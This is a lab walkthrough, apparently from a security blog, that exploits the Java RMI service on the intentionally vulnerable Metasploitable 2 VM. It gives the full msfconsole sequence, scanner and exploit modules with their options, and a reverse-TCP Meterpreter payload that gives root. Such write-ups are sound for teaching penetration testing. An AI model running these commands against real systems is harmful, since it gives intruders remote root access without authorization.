Metasploitable 2 Server: Exploiting java_rmi (Java Remote Method Invocation) to gain root access

Goal:  Exploit Java Remote Method Invocation (java_rmi) to Get Root access.

Java Remote Method Invocation, or Java RMI, is an object-oriented RPC mechanism that allows an object located in one Java virtual machine to call methods on an object located in another Java virtual machine. This enables developers to write distributed applications using an object-oriented paradigm.


Auxiliary scanning using msfconsole

Start the Metasploit database and console by typing the below command in the terminal:

┌─[mrdev@mr-dev]─[~]
└──╼ $ sudo msfdb init && sudo msfconsole
[sudo] password for mrdev: 
[+] Starting database
[i] The database appears to be already configured, skipping initialization
                                                  
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up   to a file, use the makerc command

msf6 > 

There's an auxiliary scanner we can use to detect whether the Java RMI vulnerability exists on our target; At the prompt, type search java_rmi and log the "auxiliary/scanner/misc/java_rmi_server" module.

msf6 > search java_rmi

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   2  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   3  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/browser/java_rmi_connection_impl

msf6 > 

Next, enter use auxiliary/scanner/misc/java_rmi_server, and type options to display the settings.

msf6 > use 2
msf6 auxiliary(scanner/misc/java_rmi_server) > show options  

Module options (auxiliary/scanner/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    1099             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/misc/java_rmi_server) >

The options indicate that we have to set the RHOSTS and THREADS. Once everything is fine execute and run the command to find out if the java_rmi exploit is possible or not.

msf6 auxiliary(scanner/misc/java_rmi_server) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 auxiliary(scanner/misc/java_rmi_server) > set THREADS 16
THREADS => 16
msf6 auxiliary(scanner/misc/java_rmi_server) > run

[+] 192.168.56.3:1099     - 192.168.56.3:1099 Java RMI Endpoint Detected: Class Loader Enabled
[*] 192.168.56.3:1099     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/misc/java_rmi_server) >

We can see that the scanner detected a Java RMI endpoint on port 1099, which suggests the target may be vulnerable. Let's try to exploit it.


Exploiting Java_RMI

Back in our previous search results, locate the "exploit/multi/misc/java_rmi_server" module, and type use exploit/multi/misc/java_rmi_server to load it. 

msf6 auxiliary(scanner/misc/java_rmi_server) > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) >

From the upper command, the payload is automatically configured to java/meterpreter/reverse_tcp. If you want to configure payload, then run set payload {payload options}. 

To find out compatible payloads, then use the show payloads command to display the compatible payloads for this exploit. 

msf6 exploit(multi/misc/java_rmi_server) > show payloads 

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

msf6 exploit(multi/misc/java_rmi_server) > options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
                                         it
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                         hine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.xxx.xx.xxx   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) > 

From above we have found out that we have to set the LHOST and RHOST and the run exploit command.

msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 exploit(multi/misc/java_rmi_server) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(multi/misc/java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.3:1099 - Using URL: http://0.0.0.0:8080/GRw8tQO7
[*] 192.168.56.3:1099 - Local IP: http://192.168.43.192:8080/GRw8tQO7
[*] 192.168.56.3:1099 - Server started.
[*] 192.168.56.3:1099 - Sending RMI Header...
[*] 192.168.56.3:1099 - Sending RMI Call...
[*] 192.168.56.3:1099 - Replied to request for payload JAR
[*] Sending stage (58060 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:51528) at 2022-01-20 15:37:03 +0530
[-] 192.168.56.3:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.56.3:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >

From above, we found that a meterpreter session was created and you can find out the session using the below command:

msf6 exploit(multi/misc/java_rmi_server) > sessions  

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  192.168.56.1:4444 -> 192.168.56.3:51528 (192.168.56.3)

msf6 exploit(multi/misc/java_rmi_server) >

From above we found an active meterpreter session. Use the below command to get the meterpreter prompt:

msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: root
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > 


Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!